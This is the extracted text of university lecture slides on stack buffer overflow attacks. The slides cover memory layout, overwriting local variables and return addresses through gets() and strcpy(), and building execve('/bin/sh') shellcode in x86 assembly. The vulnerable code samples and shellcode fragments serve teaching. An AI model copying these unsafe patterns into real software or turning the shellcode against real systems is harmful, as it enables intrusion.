buffer overflow attacks
DESCRIPTION
Buffer Overflow Attacks. 6.857, Computer & Network Security. Basic Idea Sample Attacks Protection. 1. 6.857. History. 6.857, Computer & Network Security. Basic Idea Sample Attacks Protection. 1960s. 1970s. 1980s. 1990s. Today. - PowerPoint PPT PresentationTRANSCRIPT
![Page 1: Buffer Overflow Attacks](https://reader035.vdocuments.net/reader035/viewer/2022062221/568144cc550346895db196ff/html5/thumbnails/1.jpg)
Buffer Overflow Attacks
1
Basic Idea Sample Attacks Protection Basic Idea Sample Attacks Protection
6.8576.857
6.857, Computer & Network Security
![Page 2: Buffer Overflow Attacks](https://reader035.vdocuments.net/reader035/viewer/2022062221/568144cc550346895db196ff/html5/thumbnails/2.jpg)
History
2
Basic IdeaBasic Idea Sample Attacks Protection Sample Attacks Protection
6.8576.857
6.857, Computer & Network Security
1960s 1970s 1990s Today1980s
Vulnerability exploited on time-share machines
Attacks on early networkedmachines
Morris Worm usesbuffer overflow in
taking down significantportion of the Internet
Buffer overflow attacks become(arguably) the most pressing
security concerns facing the web(e..g., in 1998, 2/3 of CERT advisories
were buffer overflow related)
The problem persists(e.g., IE VML advisory from
two months ago).
![Page 3: Buffer Overflow Attacks](https://reader035.vdocuments.net/reader035/viewer/2022062221/568144cc550346895db196ff/html5/thumbnails/3.jpg)
Memory Layout
3
Basic IdeaBasic Idea Sample Attacks Protection Sample Attacks Protection
6.8576.857
6.857, Computer & Network Security
Text
Data
Heap
Stack
High Addresses
Low Addresses
![Page 4: Buffer Overflow Attacks](https://reader035.vdocuments.net/reader035/viewer/2022062221/568144cc550346895db196ff/html5/thumbnails/4.jpg)
Memory Layout
4
Basic IdeaBasic Idea Sample Attacks Protection Sample Attacks Protection
6.8576.857
6.857, Computer & Network Security
Text
Data
Heap
Stack
High Addresses
Low Addressesvoid func(int a, int b) {
char buffer[10];}void main() {
func(1,2);}
![Page 5: Buffer Overflow Attacks](https://reader035.vdocuments.net/reader035/viewer/2022062221/568144cc550346895db196ff/html5/thumbnails/5.jpg)
Memory Layout
5
Basic IdeaBasic Idea Sample Attacks Protection Sample Attacks Protection
6.8576.857
6.857, Computer & Network Security
Text
Data
Heap
Stack
High Addresses
Low Addressesvoid func(int a, int b) {
char buffer[10];}void main() {
func(1,2);}
pushl $2pushl $1call func…pushl %ebpmovl %esp, %ebpsubl $24, %esp
pushl $2pushl $1call func…pushl %ebpmovl %esp, %ebpsubl $24, %esp
![Page 6: Buffer Overflow Attacks](https://reader035.vdocuments.net/reader035/viewer/2022062221/568144cc550346895db196ff/html5/thumbnails/6.jpg)
Memory Layout
6
Basic IdeaBasic Idea Sample Attacks Protection Sample Attacks Protection
6.8576.857
6.857, Computer & Network Security
Text
Data
Heap
Stack
High Addresses
Low Addressesvoid func(int a, int b) {
char buffer[10];}void main() {
func(1,2);}
pushl $2pushl $1call func…pushl %ebpmovl %esp, %ebpsubl $24, %esp
pushl $2pushl $1call func…pushl %ebpmovl %esp, %ebpsubl $24, %esp
sp
fp
![Page 7: Buffer Overflow Attacks](https://reader035.vdocuments.net/reader035/viewer/2022062221/568144cc550346895db196ff/html5/thumbnails/7.jpg)
Memory Layout
7
Basic IdeaBasic Idea Sample Attacks Protection Sample Attacks Protection
6.8576.857
6.857, Computer & Network Security
Text
Data
Heap
Stack
High Addresses
Low Addressesvoid func(int a, int b) {
char buffer[10];}void main() {
func(1,2);}
pushl $2pushl $1call func…pushl %ebpmovl %esp, %ebpsubl $24, %esp
pushl $2pushl $1call func…pushl %ebpmovl %esp, %ebpsubl $24, %esp
sp
fp2
![Page 8: Buffer Overflow Attacks](https://reader035.vdocuments.net/reader035/viewer/2022062221/568144cc550346895db196ff/html5/thumbnails/8.jpg)
Memory Layout
8
Basic IdeaBasic Idea Sample Attacks Protection Sample Attacks Protection
6.8576.857
6.857, Computer & Network Security
Text
Data
Heap
Stack
High Addresses
Low Addressesvoid func(int a, int b) {
char buffer[10];}void main() {
func(1,2);}
pushl $2pushl $1call func…pushl %ebpmovl %esp, %ebpsubl $24, %esp
pushl $2pushl $1call func…pushl %ebpmovl %esp, %ebpsubl $24, %esp
sp
fp2
1
![Page 9: Buffer Overflow Attacks](https://reader035.vdocuments.net/reader035/viewer/2022062221/568144cc550346895db196ff/html5/thumbnails/9.jpg)
Memory Layout
9
Basic IdeaBasic Idea Sample Attacks Protection Sample Attacks Protection
6.8576.857
6.857, Computer & Network Security
Text
Data
Heap
Stack
High Addresses
Low Addressesvoid func(int a, int b) {
char buffer[10];}void main() {
func(1,2);}
pushl $2pushl $1call func…pushl %ebpmovl %esp, %ebpsubl $24, %esp
pushl $2pushl $1call func…pushl %ebpmovl %esp, %ebpsubl $24, %esp
sp
fp2
1
ret
![Page 10: Buffer Overflow Attacks](https://reader035.vdocuments.net/reader035/viewer/2022062221/568144cc550346895db196ff/html5/thumbnails/10.jpg)
Memory Layout
10
Basic IdeaBasic Idea Sample Attacks Protection Sample Attacks Protection
6.8576.857
6.857, Computer & Network Security
Text
Data
Heap
Stack
High Addresses
Low Addressesvoid func(int a, int b) {
char buffer[10];}void main() {
func(1,2);}
pushl $2pushl $1call func…pushl %ebpmovl %esp, %ebpsubl $24, %esp
pushl $2pushl $1call func…pushl %ebpmovl %esp, %ebpsubl $24, %esp
sp
fp2
1
ret
sfp
![Page 11: Buffer Overflow Attacks](https://reader035.vdocuments.net/reader035/viewer/2022062221/568144cc550346895db196ff/html5/thumbnails/11.jpg)
Memory Layout
11
Basic IdeaBasic Idea Sample Attacks Protection Sample Attacks Protection
6.8576.857
6.857, Computer & Network Security
Text
Data
Heap
Stack
High Addresses
Low Addressesvoid func(int a, int b) {
char buffer[10];}void main() {
func(1,2);}
pushl $2pushl $1call func…pushl %ebpmovl %esp, %ebpsubl $24, %esp
pushl $2pushl $1call func…pushl %ebpmovl %esp, %ebpsubl $24, %esp
sp
fp2
1
ret
sfp
![Page 12: Buffer Overflow Attacks](https://reader035.vdocuments.net/reader035/viewer/2022062221/568144cc550346895db196ff/html5/thumbnails/12.jpg)
Memory Layout
12
Basic IdeaBasic Idea Sample Attacks Protection Sample Attacks Protection
6.8576.857
6.857, Computer & Network Security
Text
Data
Heap
Stack
High Addresses
Low Addressesvoid func(int a, int b) {
char buffer[10];}void main() {
func(1,2);}
pushl $2pushl $1call func…pushl %ebpmovl %esp, %ebpsubl $24, %esp
pushl $2pushl $1call func…pushl %ebpmovl %esp, %ebpsubl $24, %esp
sp
fp2
1
ret
sfp
![Page 13: Buffer Overflow Attacks](https://reader035.vdocuments.net/reader035/viewer/2022062221/568144cc550346895db196ff/html5/thumbnails/13.jpg)
Memory Layout
13
Basic IdeaBasic Idea Sample Attacks Protection Sample Attacks Protection
6.8576.857
6.857, Computer & Network Security
Text
Data
Heap
Stack
High Addresses
Low Addressesvoid func(int a, int b) {
char buffer[10];}void main() {
func(1,2);}
pushl $2pushl $1call func…pushl %ebpmovl %esp, %ebpsubl $24, %esp
pushl $2pushl $1call func…pushl %ebpmovl %esp, %ebpsubl $24, %esp
sp
fp2
1
ret
sfp
buffer
![Page 14: Buffer Overflow Attacks](https://reader035.vdocuments.net/reader035/viewer/2022062221/568144cc550346895db196ff/html5/thumbnails/14.jpg)
Memory Layout
14
Basic IdeaBasic Idea Sample Attacks Protection Sample Attacks Protection
6.8576.857
6.857, Computer & Network Security
Text
Data
Heap
Stack
High Addresses
Low Addressesvoid func(int a, int b) {
char buffer[10]; strcpy(buffer, bigstr);}
sp
fp2
1
ret
sfp
buffer
![Page 15: Buffer Overflow Attacks](https://reader035.vdocuments.net/reader035/viewer/2022062221/568144cc550346895db196ff/html5/thumbnails/15.jpg)
Memory Layout
15
Basic IdeaBasic Idea Sample Attacks Protection Sample Attacks Protection
6.8576.857
6.857, Computer & Network Security
Text
Data
Heap
Stack
High Addresses
Low Addressesvoid func(int a, int b) {
char buffer[10]; strcpy(buffer, bigstr);}
sp
fp2
1
ret
sfp
bigstr
![Page 16: Buffer Overflow Attacks](https://reader035.vdocuments.net/reader035/viewer/2022062221/568144cc550346895db196ff/html5/thumbnails/16.jpg)
Sample Attacks
16
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
Modify local variables
Modify return address to skip/repeat code
Modify return address to run evil code
![Page 17: Buffer Overflow Attacks](https://reader035.vdocuments.net/reader035/viewer/2022062221/568144cc550346895db196ff/html5/thumbnails/17.jpg)
Modify Local Variables
17
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
Modify local variables
Modify return address to skip/repeat code
Modify return address to run evil code
![Page 18: Buffer Overflow Attacks](https://reader035.vdocuments.net/reader035/viewer/2022062221/568144cc550346895db196ff/html5/thumbnails/18.jpg)
Modify Local Variables
18
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
void handleRequest() { int code; char subject[] = "[[[SECRET]]] user request"; char recp[] = "[email protected]"; char query[8]; strcpy(query, getenv("QUERY_STRING"));
//send top secret e-mail to recp …}
void handleRequest() { int code; char subject[] = "[[[SECRET]]] user request"; char recp[] = "[email protected]"; char query[8]; strcpy(query, getenv("QUERY_STRING"));
//send top secret e-mail to recp …}
![Page 19: Buffer Overflow Attacks](https://reader035.vdocuments.net/reader035/viewer/2022062221/568144cc550346895db196ff/html5/thumbnails/19.jpg)
Modify Local Variables
19
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
void handleRequest() { int code; char subject[] = "[[[SECRET]]] user request"; char recp[] = "[email protected]"; char query[8]; strcpy(query, getenv("QUERY_STRING"));
//send top secret e-mail to recp …}
void handleRequest() { int code; char subject[] = "[[[SECRET]]] user request"; char recp[] = "[email protected]"; char query[8]; strcpy(query, getenv("QUERY_STRING"));
//send top secret e-mail to recp …}
ret
sfp
query
subject[]
recp[]
![Page 20: Buffer Overflow Attacks](https://reader035.vdocuments.net/reader035/viewer/2022062221/568144cc550346895db196ff/html5/thumbnails/20.jpg)
Modify Local Variables
20
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
void handleRequest() { int code; char subject[] = "[[[SECRET]]] user request"; char recp[] = "[email protected]"; char query[8]; strcpy(query, getenv("QUERY_STRING"));
//send top secret e-mail to recp …}
void handleRequest() { int code; char subject[] = "[[[SECRET]]] user request"; char recp[] = "[email protected]"; char query[8]; strcpy(query, getenv("QUERY_STRING"));
//send top secret e-mail to recp …}
ret
sfp
query
subject[]
recp[]
![Page 21: Buffer Overflow Attacks](https://reader035.vdocuments.net/reader035/viewer/2022062221/568144cc550346895db196ff/html5/thumbnails/21.jpg)
Modify Local Variables
21
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
void handleRequest() { int code; char subject[] = "[[[SECRET]]] user request"; char recp[] = "[email protected]"; char query[8]; strcpy(query, getenv("QUERY_STRING"));
//send top secret e-mail to recp …}
void handleRequest() { int code; char subject[] = "[[[SECRET]]] user request"; char recp[] = "[email protected]"; char query[8]; strcpy(query, getenv("QUERY_STRING"));
//send top secret e-mail to recp …}
ret
sfp
subject[]
recp[]
query
![Page 22: Buffer Overflow Attacks](https://reader035.vdocuments.net/reader035/viewer/2022062221/568144cc550346895db196ff/html5/thumbnails/22.jpg)
Modify Local Variables
22
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
void handleRequest() { int code; char subject[] = "[[[SECRET]]] user request"; char recp[] = "[email protected]"; char query[8]; strcpy(query, getenv("QUERY_STRING"));
//send top secret e-mail to recp …}
void handleRequest() { int code; char subject[] = "[[[SECRET]]] user request"; char recp[] = "[email protected]"; char query[8]; strcpy(query, getenv("QUERY_STRING"));
//send top secret e-mail to recp …}
ret
sfp
subject[]
recp[]
query
Demo…
![Page 23: Buffer Overflow Attacks](https://reader035.vdocuments.net/reader035/viewer/2022062221/568144cc550346895db196ff/html5/thumbnails/23.jpg)
Repeat Code…
23
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
Modify local variables
Modify return address to skip/repeat code
Modify return address to run evil code
![Page 24: Buffer Overflow Attacks](https://reader035.vdocuments.net/reader035/viewer/2022062221/568144cc550346895db196ff/html5/thumbnails/24.jpg)
Repeat Code…
24
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
b
a
ret
sfp
buffer
void func(int a, int b){ printf("Inside func loop.\n"); char buffer[4]; gets(buffer);}
main(){ printf("about to call func.\n"); func(5,6); printf("done.\n");}
void func(int a, int b){ printf("Inside func loop.\n"); char buffer[4]; gets(buffer);}
main(){ printf("about to call func.\n"); func(5,6); printf("done.\n");}
![Page 25: Buffer Overflow Attacks](https://reader035.vdocuments.net/reader035/viewer/2022062221/568144cc550346895db196ff/html5/thumbnails/25.jpg)
Repeat Code…
25
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
b
a
ret
sfp
buffer
void func(int a, int b){ printf("Inside func loop.\n"); char buffer[4]; gets(buffer);}
main(){ printf("about to call func.\n"); func(5,6); printf("done.\n");}
void func(int a, int b){ printf("Inside func loop.\n"); char buffer[4]; gets(buffer);}
main(){ printf("about to call func.\n"); func(5,6); printf("done.\n");}
![Page 26: Buffer Overflow Attacks](https://reader035.vdocuments.net/reader035/viewer/2022062221/568144cc550346895db196ff/html5/thumbnails/26.jpg)
Repeat Code…
26
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
b
a
ret
sfp
void func(int a, int b){ printf("Inside func loop.\n"); char buffer[4]; gets(buffer);}
main(){ printf("about to call func.\n"); func(5,6); printf("done.\n");}
void func(int a, int b){ printf("Inside func loop.\n"); char buffer[4]; gets(buffer);}
main(){ printf("about to call func.\n"); func(5,6); printf("done.\n");}
addr
![Page 27: Buffer Overflow Attacks](https://reader035.vdocuments.net/reader035/viewer/2022062221/568144cc550346895db196ff/html5/thumbnails/27.jpg)
Repeat Code…
27
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
b
a
ret
sfp
void func(int a, int b){ printf("Inside func loop.\n"); char buffer[4]; gets(buffer);}
main(){ printf("about to call func.\n"); func(5,6); printf("done.\n");}
void func(int a, int b){ printf("Inside func loop.\n"); char buffer[4]; gets(buffer);}
main(){ printf("about to call func.\n"); func(5,6); printf("done.\n");}
buffer
![Page 28: Buffer Overflow Attacks](https://reader035.vdocuments.net/reader035/viewer/2022062221/568144cc550346895db196ff/html5/thumbnails/28.jpg)
Repeat Code…
28
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
b
a
ret
sfp
void func(int a, int b){ printf("Inside func loop.\n"); char buffer[4]; gets(buffer);}
main(){ printf("about to call func.\n"); func(5,6); printf("done.\n");}
void func(int a, int b){ printf("Inside func loop.\n"); char buffer[4]; gets(buffer);}
main(){ printf("about to call func.\n"); func(5,6); printf("done.\n");}
addr
![Page 29: Buffer Overflow Attacks](https://reader035.vdocuments.net/reader035/viewer/2022062221/568144cc550346895db196ff/html5/thumbnails/29.jpg)
Repeat Code…
29
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
b
a
ret
sfp
void func(int a, int b){ printf("Inside func loop.\n"); char buffer[4]; gets(buffer);}
main(){ printf("about to call func.\n"); func(5,6); printf("done.\n");}
void func(int a, int b){ printf("Inside func loop.\n"); char buffer[4]; gets(buffer);}
main(){ printf("about to call func.\n"); func(5,6); printf("done.\n");}
addr
Demo…
![Page 30: Buffer Overflow Attacks](https://reader035.vdocuments.net/reader035/viewer/2022062221/568144cc550346895db196ff/html5/thumbnails/30.jpg)
Sample Attacks
30
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
Modify local variables
Modify return address to skip/repeat code
Modify return address to run evil code
![Page 31: Buffer Overflow Attacks](https://reader035.vdocuments.net/reader035/viewer/2022062221/568144cc550346895db196ff/html5/thumbnails/31.jpg)
Running Evil Code…
31
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
2
1
ret
sfp
buffer
void func(int a, int b) {char buffer[32];
gets(buffer); …}
void func(int a, int b) {char buffer[32];
gets(buffer); …}
![Page 32: Buffer Overflow Attacks](https://reader035.vdocuments.net/reader035/viewer/2022062221/568144cc550346895db196ff/html5/thumbnails/32.jpg)
Running Evil Code…
32
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
2
1
void func(int a, int b) {char buffer[32];
gets(buffer); …}
void func(int a, int b) {char buffer[32];
gets(buffer); …}
evil codeevil codeevil codeevil codenopnopnopnopnopnopnopnopnopnopnop0x80483eb
![Page 33: Buffer Overflow Attacks](https://reader035.vdocuments.net/reader035/viewer/2022062221/568144cc550346895db196ff/html5/thumbnails/33.jpg)
Running Evil Code…
33
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
2
1
void func(int a, int b) {char buffer[32];
gets(buffer); …}
void func(int a, int b) {char buffer[32];
gets(buffer); …}
evil codeevil codeevil codeevil codenopnopnopnopnopnopnopnopnopnopnop0x80483eb
![Page 34: Buffer Overflow Attacks](https://reader035.vdocuments.net/reader035/viewer/2022062221/568144cc550346895db196ff/html5/thumbnails/34.jpg)
Running Evil Code…
34
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
2
1
void func(int a, int b) {char buffer[32];
gets(buffer); …}
void func(int a, int b) {char buffer[32];
gets(buffer); …}
evil codeevil codeevil codeevil codenopnopnopnopnopnopnopnopnopnopnop0x80483eb
![Page 35: Buffer Overflow Attacks](https://reader035.vdocuments.net/reader035/viewer/2022062221/568144cc550346895db196ff/html5/thumbnails/35.jpg)
Running Evil Code…
35
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
2
1
void func(int a, int b) {char buffer[32];
gets(buffer); …}
void func(int a, int b) {char buffer[32];
gets(buffer); …}
evil codeevil codeevil codeevil codenopnopnopnopnopnopnopnopnopnopnop0x80483eb
![Page 36: Buffer Overflow Attacks](https://reader035.vdocuments.net/reader035/viewer/2022062221/568144cc550346895db196ff/html5/thumbnails/36.jpg)
Running Evil Code…
36
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
2
1
void func(int a, int b) {char buffer[32];
gets(buffer); …}
void func(int a, int b) {char buffer[32];
gets(buffer); …}
evil codeevil codeevil codeevil codenopnopnopnopnopnopnopnopnopnopnop0x80483eb
????
![Page 37: Buffer Overflow Attacks](https://reader035.vdocuments.net/reader035/viewer/2022062221/568144cc550346895db196ff/html5/thumbnails/37.jpg)
void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL);}
void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL);}
Running Evil Code…
37
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
![Page 38: Buffer Overflow Attacks](https://reader035.vdocuments.net/reader035/viewer/2022062221/568144cc550346895db196ff/html5/thumbnails/38.jpg)
void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL);}
void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL);}
Running Evil Code…
38
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
movl $0x80884a8,0xfffffff8(%ebp)movl $0x0,0xfffffffc(%ebp)push $0x0lea 0xfffffff8(%ebp),%eaxpush %eaxpushl 0xfffffff8(%ebp)call 0x804d880 <execve>
movl $0x80884a8,0xfffffff8(%ebp)movl $0x0,0xfffffffc(%ebp)push $0x0lea 0xfffffff8(%ebp),%eaxpush %eaxpushl 0xfffffff8(%ebp)call 0x804d880 <execve>
![Page 39: Buffer Overflow Attacks](https://reader035.vdocuments.net/reader035/viewer/2022062221/568144cc550346895db196ff/html5/thumbnails/39.jpg)
void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL);}
void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL);}
Running Evil Code…
39
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
movl $0x80884a8,0xfffffff8(%ebp)movl $0x0,0xfffffffc(%ebp)push $0x0lea 0xfffffff8(%ebp),%eaxpush %eaxpushl 0xfffffff8(%ebp)call 0x804d880 <execve>
movl $0x80884a8,0xfffffff8(%ebp)movl $0x0,0xfffffffc(%ebp)push $0x0lea 0xfffffff8(%ebp),%eaxpush %eaxpushl 0xfffffff8(%ebp)call 0x804d880 <execve>
0xffffffff
![Page 40: Buffer Overflow Attacks](https://reader035.vdocuments.net/reader035/viewer/2022062221/568144cc550346895db196ff/html5/thumbnails/40.jpg)
void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL);}
void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL);}
Running Evil Code…
40
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
movl $0x80884a8,0xfffffff8(%ebp)movl $0x0,0xfffffffc(%ebp)push $0x0lea 0xfffffff8(%ebp),%eaxpush %eaxpushl 0xfffffff8(%ebp)call 0x804d880 <execve>
movl $0x80884a8,0xfffffff8(%ebp)movl $0x0,0xfffffffc(%ebp)push $0x0lea 0xfffffff8(%ebp),%eaxpush %eaxpushl 0xfffffff8(%ebp)call 0x804d880 <execve>
0xffffffff
0x80884a80xfffffff8
“/bin/sh”
![Page 41: Buffer Overflow Attacks](https://reader035.vdocuments.net/reader035/viewer/2022062221/568144cc550346895db196ff/html5/thumbnails/41.jpg)
void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL);}
void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL);}
Running Evil Code…
41
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
movl $0x80884a8,0xfffffff8(%ebp)movl $0x0,0xfffffffc(%ebp)push $0x0lea 0xfffffff8(%ebp),%eaxpush %eaxpushl 0xfffffff8(%ebp)call 0x804d880 <execve>
movl $0x80884a8,0xfffffff8(%ebp)movl $0x0,0xfffffffc(%ebp)push $0x0lea 0xfffffff8(%ebp),%eaxpush %eaxpushl 0xfffffff8(%ebp)call 0x804d880 <execve>
0xffffffff
0x80884a80xfffffff8
NULL0xfffffffc
![Page 42: Buffer Overflow Attacks](https://reader035.vdocuments.net/reader035/viewer/2022062221/568144cc550346895db196ff/html5/thumbnails/42.jpg)
void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL);}
void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL);}
Running Evil Code…
42
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
movl $0x80884a8,0xfffffff8(%ebp)movl $0x0,0xfffffffc(%ebp)push $0x0lea 0xfffffff8(%ebp),%eaxpush %eaxpushl 0xfffffff8(%ebp)call 0x804d880 <execve>
movl $0x80884a8,0xfffffff8(%ebp)movl $0x0,0xfffffffc(%ebp)push $0x0lea 0xfffffff8(%ebp),%eaxpush %eaxpushl 0xfffffff8(%ebp)call 0x804d880 <execve>
0xffffffff
0x80884a80xfffffff8
NULL0xfffffffc
name
![Page 43: Buffer Overflow Attacks](https://reader035.vdocuments.net/reader035/viewer/2022062221/568144cc550346895db196ff/html5/thumbnails/43.jpg)
void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL);}
void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL);}
Running Evil Code…
43
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
movl $0x80884a8,0xfffffff8(%ebp)movl $0x0,0xfffffffc(%ebp)push $0x0lea 0xfffffff8(%ebp),%eaxpush %eaxpushl 0xfffffff8(%ebp)call 0x804d880 <execve>
movl $0x80884a8,0xfffffff8(%ebp)movl $0x0,0xfffffffc(%ebp)push $0x0lea 0xfffffff8(%ebp),%eaxpush %eaxpushl 0xfffffff8(%ebp)call 0x804d880 <execve>
0xffffffff
0x80884a80xfffffff8
NULL0xfffffffc
NULL
0xfffffff8
0x80884a8
![Page 44: Buffer Overflow Attacks](https://reader035.vdocuments.net/reader035/viewer/2022062221/568144cc550346895db196ff/html5/thumbnails/44.jpg)
void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL);}
void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL);}
Running Evil Code…
44
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
0xffffffff
0x80884a80xfffffff8
NULL0xfffffffc
NULL
0x80884a8
0xfffffff8
ret
sfpfp (ebp)
![Page 45: Buffer Overflow Attacks](https://reader035.vdocuments.net/reader035/viewer/2022062221/568144cc550346895db196ff/html5/thumbnails/45.jpg)
void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL);}
void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL);}
Running Evil Code…
45
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
0xffffffff
0x80884a80xfffffff8
NULL0xfffffffc
NULL
ret
sfpfp (ebp)
mov 0x8(%ebp),%ebxmov 0xc(%ebp),%ecxmov 0x10(%ebp),%edxmov $0xb,%eaxint $0x80
mov 0x8(%ebp),%ebxmov 0xc(%ebp),%ecxmov 0x10(%ebp),%edxmov $0xb,%eaxint $0x80
ebx0x80884a8
0xfffffff8
![Page 46: Buffer Overflow Attacks](https://reader035.vdocuments.net/reader035/viewer/2022062221/568144cc550346895db196ff/html5/thumbnails/46.jpg)
void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL);}
void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL);}
Running Evil Code…
46
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
0xffffffff
0x80884a80xfffffff8
NULL0xfffffffc
NULL
ret
sfpfp (ebp)
mov 0x8(%ebp),%ebxmov 0xc(%ebp),%ecxmov 0x10(%ebp),%edxmov $0xb,%eaxint $0x80
mov 0x8(%ebp),%ebxmov 0xc(%ebp),%ecxmov 0x10(%ebp),%edxmov $0xb,%eaxint $0x80
ebx
ecx0x80884a8
0xfffffff8
![Page 47: Buffer Overflow Attacks](https://reader035.vdocuments.net/reader035/viewer/2022062221/568144cc550346895db196ff/html5/thumbnails/47.jpg)
void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL);}
void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL);}
Running Evil Code…
47
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
0xffffffff
0x80884a80xfffffff8
NULL0xfffffffc
NULL
ret
sfpfp (ebp)
mov 0x8(%ebp),%ebxmov 0xc(%ebp),%ecxmov 0x10(%ebp),%edxmov $0xb,%eaxint $0x80
mov 0x8(%ebp),%ebxmov 0xc(%ebp),%ecxmov 0x10(%ebp),%edxmov $0xb,%eaxint $0x80
ebx
ecx
edx
0x80884a8
0xfffffff8
![Page 48: Buffer Overflow Attacks](https://reader035.vdocuments.net/reader035/viewer/2022062221/568144cc550346895db196ff/html5/thumbnails/48.jpg)
void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL);}
void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL);}
Running Evil Code…
48
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
0xffffffff
0x80884a80xfffffff8
NULL0xfffffffc
NULL
ret
sfpfp (ebp)
mov 0x8(%ebp),%ebxmov 0xc(%ebp),%ecxmov 0x10(%ebp),%edxmov $0xb,%eaxint $0x80
mov 0x8(%ebp),%ebxmov 0xc(%ebp),%ecxmov 0x10(%ebp),%edxmov $0xb,%eaxint $0x80
ebx
ecx
edx
0x80884a8
0xfffffff8
![Page 49: Buffer Overflow Attacks](https://reader035.vdocuments.net/reader035/viewer/2022062221/568144cc550346895db196ff/html5/thumbnails/49.jpg)
void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL);}
void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL);}
Running Evil Code…
49
Basic Idea Basic Idea Sample AttacksSample Attacks Protection Protection
6.8576.857
6.857, Computer & Network Security
0xffffffff
0x80884a80xfffffff8
NULL0xfffffffc
NULL
ret
sfpfp (ebp)
mov 0x8(%ebp),%ebxmov 0xc(%ebp),%ecxmov 0x10(%ebp),%edxmov $0xb,%eaxint $0x80
